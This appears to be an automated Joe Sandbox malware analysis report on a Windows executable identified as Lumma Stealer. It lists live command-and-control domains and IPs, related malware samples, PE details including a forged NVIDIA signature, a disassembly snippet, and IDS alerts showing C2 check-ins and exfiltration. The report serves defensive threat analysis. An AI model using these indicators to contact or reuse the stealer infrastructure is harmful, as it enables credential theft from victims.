https://platformcati.sbs/ | h226x41CQ6.exe, 00000004.00000003.1528684635.0000000003B53000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1528737340.0000000003B5C000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1528593534.0000000003B50000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1528704318.0000000003B50000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://platformcati.sbs/api~ | h226x41CQ6.exe, 00000004.00000003.1557986513.00000000012BC000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1543311993.00000000012BC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | h226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.entrust.net/2048ca.crl0 | h226x41CQ6.exe | false | | high
https://www.entrust.net/rpa0 | h226x41CQ6.exe | false | | high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta | h226x41CQ6.exe, 00000004.00000003.1559711791.0000000003B4A000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.112.1 | platformcati.sbs | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1600405
Start date and time: 2025-01-27 14:53:17 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 39s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: h226x41CQ6.exe
(renamed file extension from none to exe, renamed because original name is a hash value)
Original Sample Name: fc8506934f3f379af5f36cdccb0c17ca
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@4/5@2/1
                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 52.168.117.173, 40.126.32.72, 13.107.253.45, 4.175.87.197
                                                                                      • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
08:54:13 | API Interceptor | 8x Sleep call for process: h226x41CQ6.exe modified
10:01:18 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match: 104.21.112.1
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
AWB_5771388044 Documente de expediere.exe | Get hash | malicious | FormBook | Browse | www.buyspeechst.shop/ub3i/
z27Transferenci.exe | Get hash | malicious | FormBook | Browse | www.cheapwil.shop/ekxu/
rR39202_08.exe | Get hash | malicious | FormBook | Browse | www.enoughmoney.online/nf1d/
Bernadette Karam CV.exe | Get hash | malicious | FormBook | Browse | www.buyspeechst.shop/x8ql/
XqCBweyLoN0t8Vy.exe | Get hash | malicious | FormBook | Browse | www.arryongro-nambe.live/t44l/
RFQ862_791.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | www.dejikenkyu.cyou/pmpa/
http://case-id-100084633.argentpropertiesvb.com/ | Get hash | malicious | HTMLPhisher | Browse | case-id-100084633.argentpropertiesvb.com/
Fedex 22122024 overdue invoicesxlx..exe | Get hash | malicious | FormBook | Browse | www.enoughmoney.online/271w/
Payment Advice.exe | Get hash | malicious | FormBook | Browse | www.cikolatasampuan.xyz/s3vh/
http://informed.deliverywfv.top/us | Get hash | malicious | Unknown | Browse | informed.deliverywfv.top/us
Match: platformcati.sbs
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
oGjfUw6bZu.exe | Get hash | malicious | LummaC | Browse | 104.21.53.40
K3SRs78CAv.exe | Get hash | malicious | LummaC | Browse | 188.114.97.3
W1WowSI1iG.exe | Get hash | malicious | LummaC | Browse | 188.114.97.3
wXtaX552wr.exe | Get hash | malicious | LummaC | Browse | 188.114.97.3
6FecO9d3l9.exe | Get hash | malicious | LummaC | Browse | 188.114.97.3
2WWOAq4c3b.exe | Get hash | malicious | LummaC | Browse | 188.114.97.3
EY2raBetTi.exe | Get hash | malicious | LummaC | Browse | 188.114.96.3
PTc16LnPI5.exe | Get hash | malicious | LummaC | Browse | 188.114.97.3
yRMHuXP8fH.exe | Get hash | malicious | LummaC | Browse | 188.114.96.3
Match: CLOUDFLARENETUS
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
http://wtsevent.com | Get hash | malicious | TechSupportScam | Browse | 104.17.25.14
https://ipfs.io/ipfs/bafybeid6tjglb257r22luzrxejc72ougo4co3wky3g5aiy3b4nmq2kmedi?login=milano@iesweb.net | Get hash | malicious | Unknown | Browse | 104.18.186.31
rMM-PO-2025012786.exe | Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | 104.21.32.1
support.Client.exe | Get hash | malicious | ScreenConnect Tool | Browse | 172.67.180.49
support.Client.exe | Get hash | malicious | ScreenConnect Tool | Browse | 172.67.180.49
Attn_257133_12222022.img | Get hash | malicious | Qbot | Browse | 104.18.37.111
Wire_Transfer_000789tt.exe | Get hash | malicious | MassLogger RAT | Browse | 104.21.80.1
rIMG_1056_6772.exe | Get hash | malicious | AgentTesla | Browse | 104.26.12.205
https://giftexchangegenerator.netlify.app/ | Get hash | malicious | Unknown | Browse | 104.21.26.223
NRKCZ1PSDM.exe | Get hash | malicious | PureLog Stealer, Vidar | Browse | 172.64.41.3
Match: a0e9f5d64349fb13191bc781f81f42e1
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
QuxHx2gOLI.exe | Get hash | malicious | SmokeLoader | Browse | 104.21.112.1
New v2.2.0.exe | Get hash | malicious | LummaC Stealer | Browse | 104.21.112.1
Installer.exe | Get hash | malicious | LummaC Stealer, PureLog Stealer | Browse | 104.21.112.1
A_acid11.exe | Get hash | malicious | LummaC Stealer | Browse | 104.21.112.1
Loader.exe | Get hash | malicious | LummaC Stealer, PureLog Stealer | Browse | 104.21.112.1
4JPKDcwtDo.exe | Get hash | malicious | LummaC Stealer | Browse | 104.21.112.1
p199AjsEFs.exe | Get hash | malicious | Amadey, LummaC Stealer, Stealc | Browse | 104.21.112.1
VbEfsnL4cp.exe | Get hash | malicious | LummaC Stealer | Browse | 104.21.112.1
2E02vIiMfd.exe | Get hash | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, Socks5Systemz, Vidar | Browse | 104.21.112.1
grcKLMutRS.exe | Get hash | malicious | LummaC Stealer | Browse | 104.21.112.1

No context

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.6585768723965039
Encrypted: false
SSDEEP: 96:0kuFNdFYsyh3oI7Rq6tQXIDcQvc6QcEVcw3cE/9kM+HbHg/5hZAX/d5FMT2SlPkS:AfdFYK0BU/YjhzuiFMZ24IO83A
MD5: B23A8E06A4632EC68E703C702AAA61E9
SHA1: C9D79C61859C6E8EDCEB6207E6D4D057AC0E5BF0
SHA-256: DC46726A4DDE48D22FAC13A5080C9D7DC19C581880E5C39370206BFF1C1D4E4D
SHA-512: 55DAC05335CAD3E67CE5E668DB714939C1D504084C0C8B0F96347C8D165CD6D33B6F0956AB15F577EF49D3394759504AE2536C41F451A2054D47B66D7CDB0FF1
Malicious: true
Reputation: low
                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.2.4.5.9.6.5.2.8.8.1.8.0.0.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.2.4.5.9.6.5.3.7.4.1.1.7.7.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.6.c.5.6.d.f.b.-.f.1.e.8.-.4.6.2.5.-.9.4.b.0.-.f.8.9.9.5.f.b.4.2.e.5.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.1.3.7.2.2.2.7.-.0.0.f.b.-.4.9.a.6.-.a.0.7.7.-.6.e.0.2.f.d.1.1.4.a.b.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.h.2.2.6.x.4.1.C.Q.6...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.5.c.-.0.0.0.1.-.0.0.1.4.-.0.8.7.7.-.5.5.f.1.c.2.7.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.a.d.9.8.0.d.a.0.7.3.9.8.b.7.1.7.a.1.6.6.0.d.f.c.3.3.c.f.8.3.d.0.0.0.0.f.f.f.f.!.0.0.0.0.3.b.c.c.a.d.f.c.c.4.8.c.2.1.1.6.3.8.9.c.5.3.7.1.4.e.3.b.e.0.7.6.5.9.2.7.3.1.b.4.!.h.2.2.6.x.4.1.C.Q.6...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 14 streams, Mon Jan 27 13:54:13 2025, 0x1205a4 type
Category: dropped
Size (bytes): 32288
Entropy (8bit): 1.7259724286111786
Encrypted: false
SSDEEP: 96:5k8E7pFHyn/SJmVzJ0ti77hQzuiM8RsgJZ2p1u1TAerXWI9RWIySb4y0t84Wd/:NOOnldwOWHRspapAer3Ay0tTWd/
MD5: DC336BBA1AABFF4D9C8435F4CB4920C3
SHA1: FBDD6EE50ED0D2A52108566821AC3E04A546F1F3
SHA-256: 017B3E4F9C0D9E3FFBAA6305CBD153C74AA1C70C77D8C222814C612D807388E2
SHA-512: EF7282127FDB68DAD96B43F3ED858A4801BFB7331E697097F0E25F350C5318C60783F9D1562A2E916ECA9377C56899F280DDF38766428CCA5A3E9FF3A47CA9E0
Malicious: false
Reputation: low
                                                                                      Preview:MDMP..a..... ..........g........................d...........................T.......8...........T...............ps......................................................................................................eJ..............GenuineIntel............T.......\......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 8402
Entropy (8bit): 3.7010235130898055
Encrypted: false
SSDEEP: 192:R6l7wVeJd46x6YNmvSU7agmfkGprx89biVsfh7Wm:R6lXJS6x6YIvSU7agmfkNiufhz
MD5: E44E9FF06F578EA3637ADB5831B00506
SHA1: 9DA4933F7878BF9155C01CA67FFD89C84FBB97CE
SHA-256: 8B88D09F0DE47A40587B6248F3A6398B5CA9BA13373FDFEC75C9A2530DF917D6
SHA-512: 49BBA59092A9468F45AA13B05836FE61073EDE640EBD1B99974553DB5D34AAA96A4BF5328248D3247CA7CB9A75BA3A32B0CF9628E10B50A217FD99348D2C4768
Malicious: false
Reputation: low
                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.2.6.0.<./.P.i.

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4720
Entropy (8bit): 4.480857344817235
Encrypted: false
SSDEEP: 48:cvIwWl8zsLrJg77aI9F6WpW8VY2Ym8M4Jg83iEFY+q8vh3ik7yzvzId:uIjfLFI7b77VKJXGKBz4bId
MD5: AFE5AA97CE747AE120BE36E3AF1F78B1
SHA1: 7363D0EC300046034E50E6510825E4BE4A382032
SHA-256: B0637E476BD9B9746FA53068D3D5B1C3A23C39287FADA5ABBCC153D785482050
SHA-512: 9D4197C28AB09C157A91DBDC65959D0DB6CAA6967AD031EE4262774E00DC63B7D225344171F4FC50E1125115D8A7DCFD9C1AC7982DEB3BFC9438929220060DD4
Malicious: false
Reputation: low
                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="694376" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: MS Windows registry file, NT/2000 or above
Category: dropped
Size (bytes): 1835008
Entropy (8bit): 4.416673673402909
Encrypted: false
SSDEEP: 6144:Ccifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNW5+:vi58oSWIZBk2MM6AFBYo
MD5: 3BEF5D0303B47AAD2E6170BC4F63C236
SHA1: 532B7ACDCCB0FC28D83B7CE9EAE46FF8B5E8675C
SHA-256: 62AB5F4D836B2ACEC01349010C7879B7EED7D71BA8AB2818C02DC1CF176EC62A
SHA-512: DD0EE1580E3CEDE8460317D107FAAF7D7619341F262D80349D6B5BDD572086DFD7E00BE1EDA79E268BA2CBF991F59CBCEE4355524FBDBD855396DDDDA2135821
Malicious: false
Reputation: low
                                                                                      Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm../..p..............................................................................................................................................................................................................................................................................................................................................bS8.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.677322192663024
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: h226x41CQ6.exe
File size: 491'048 bytes
MD5: fc8506934f3f379af5f36cdccb0c17ca
SHA1: 3bccadfcc48c2116389c53714e3be076592731b4
SHA256: 5bd0a7c399000541ab5f7398af02d5ced96e4f3adcea59a63c35dcf890bdc8de
SHA512: fdf07feaaa7429948fe406d48446bf56eb0b8ffbc28aab0e8c6b07f07efd1b28510145f08018a8b72d242afe2d743ca69e8ef238c1af1ed4dba1389529df96c9
SSDEEP: 6144:4SXqWHJut4OcfDdJc2CSe5xyMUq27fqAytMYbUMPFr5pOUkMQZsHyRZJT33oEO:FXqWrOQb2ZUHfqAyTUMLUMQhZ33oEO
TLSH: C6A4120675C0C072E9664A328870DBF19B7CFC344F605EDF33995A7A9FA43C24A1696B
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Nzu..............i.......i.......i.......i..........^.......................#...B.......B.......B.......Rich...................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x401d29
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x6713A8A8 [Sat Oct 19 12:40:08 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 12fb41fe7c2715179030b9cdaa5263a9
Signature Valid: false
Signature Issuer: CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232
Not Before, Not After:
• 13/01/2023 01:00:00, 17/01/2026 00:59:59
Subject Chain:
• CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
Version: 3
Thumbprint MD5: 5F1B6B6C408DB2B4D60BAA489E9A0E5A
Thumbprint SHA-1: 15F760D82C79D22446CC7D4806540BF632B1E104
Thumbprint SHA-256: 28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
Serial: 0997C56CAA59055394D9A9CDB8BEEB56
Instruction
call 00007FE240F6D62Dh
jmp 00007FE240F6D0BFh
push ebp
mov ebp, esp
push 00000000h
call dword ptr [00414014h]
push dword ptr [ebp+08h]
call dword ptr [00414010h]
push C0000409h
call dword ptr [00414018h]
push eax
call dword ptr [0041401Ch]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [00414020h]
test eax, eax
je 00007FE240F6D247h
push 00000002h
pop ecx
int 29h
mov dword ptr [00471088h], eax
mov dword ptr [00471084h], ecx
mov dword ptr [00471080h], edx
mov dword ptr [0047107Ch], ebx
mov dword ptr [00471078h], esi
mov dword ptr [00471074h], edi
mov word ptr [004710A0h], ss
mov word ptr [00471094h], cs
mov word ptr [00471070h], ds
mov word ptr [0047106Ch], es
mov word ptr [00471068h], fs
mov word ptr [00471064h], gs
pushfd
pop dword ptr [00471098h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0047108Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00471090h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0047109Ch], eax
mov eax, dword ptr [ebp-00000324h]
mov dword ptr [00470FD8h], 00010001h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1a6b8 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x72000 | 0x1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x75800 | 0x2628 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x73000 | 0x10b8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x19970 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x198b0 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x14000 | 0x118 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x12580 | 0x12600 | ac9ad1c701e7d6a60f117a40bdfced55 | False | 0.6130420918367347 | COM executable for DOS | 6.652849199056284 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x14000 | 0x6cfc | 0x6e00 | 6ad4c3bbd048d271d2404b264ab0f6c2 | False | 0.4693536931818182 | data | 5.111738586022721 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x1b000 | 0x569cc | 0x56000 | 903254533ed0a6b682e735f437f72d50 | False | 0.9944528978924418 | data | 7.995099656093306 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x72000 | 0x1e0 | 0x200 | 1a74fae71ecce055ab8978394eed8aa8 | False | 0.52734375 | data | 4.704363013479242 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x73000 | 0x10b8 | 0x1200 | f3f166dae9240d335b1dad3fad88f030 | False | 0.7322048611111112 | data | 6.307172215022896 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.ball | 0x75000 | 0x2400 | 0x2400 | 406c6cd69e5c18b4f7e63b50165763c6 | False | 0.027452256944444444 | data | 0.26840349151112036 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ball | 0x78000 | 0x2400 | 0x2400 | 406c6cd69e5c18b4f7e63b50165763c6 | False | 0.027452256944444444 | data | 0.26840349151112036 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x72060 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Import
KERNEL32.dll | GetSystemFileCacheSize, AddAtomA, VirtualQuery, VirtualQueryEx, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, WriteConsoleW, RaiseException, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, EncodePointer, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapFree, LCMapStringW, GetFileType, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetStringTypeW, GetProcessHeap, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, GetFileSizeEx, SetFilePointerEx, HeapSize, HeapReAlloc, CloseHandle, CreateFileW, DecodePointer
Language of compilation system | Country where language is spoken
English | United States

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-27T14:54:13.379336+0100 | 2056706 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (platformcati .sbs) | 1 | 192.168.2.7 | 61325 | 1.1.1.1 | 53 | UDP
2025-01-27T14:54:13.879270+0100 | 2056707 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (platformcati .sbs in TLS SNI) | 1 | 192.168.2.7 | 49702 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:13.879270+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49702 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:14.198569+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.7 | 49702 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:14.198569+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49702 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:15.356568+0100 | 2056707 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (platformcati .sbs in TLS SNI) | 1 | 192.168.2.7 | 49703 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:15.356568+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49703 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:15.863766+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.7 | 49703 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:15.863766+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49703 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:16.739157+0100 | 2056707 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (platformcati .sbs in TLS SNI) | 1 | 192.168.2.7 | 49705 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:16.739157+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49705 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:40.121324+0100 | 2056707 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (platformcati .sbs in TLS SNI) | 1 | 192.168.2.7 | 49838 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:40.121324+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49838 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:41.576040+0100 | 2056707 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (platformcati .sbs in TLS SNI) | 1 | 192.168.2.7 | 49849 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:41.576040+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49849 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:43.214282+0100 | 2056707 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (platformcati .sbs in TLS SNI) | 1 | 192.168.2.7 | 49860 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:43.214282+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49860 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:45.046611+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.7 | 49860 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:46.133395+0100 | 2056707 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (platformcati .sbs in TLS SNI) | 1 | 192.168.2.7 | 49871 | 104.21.112.1 | 443 | TCP
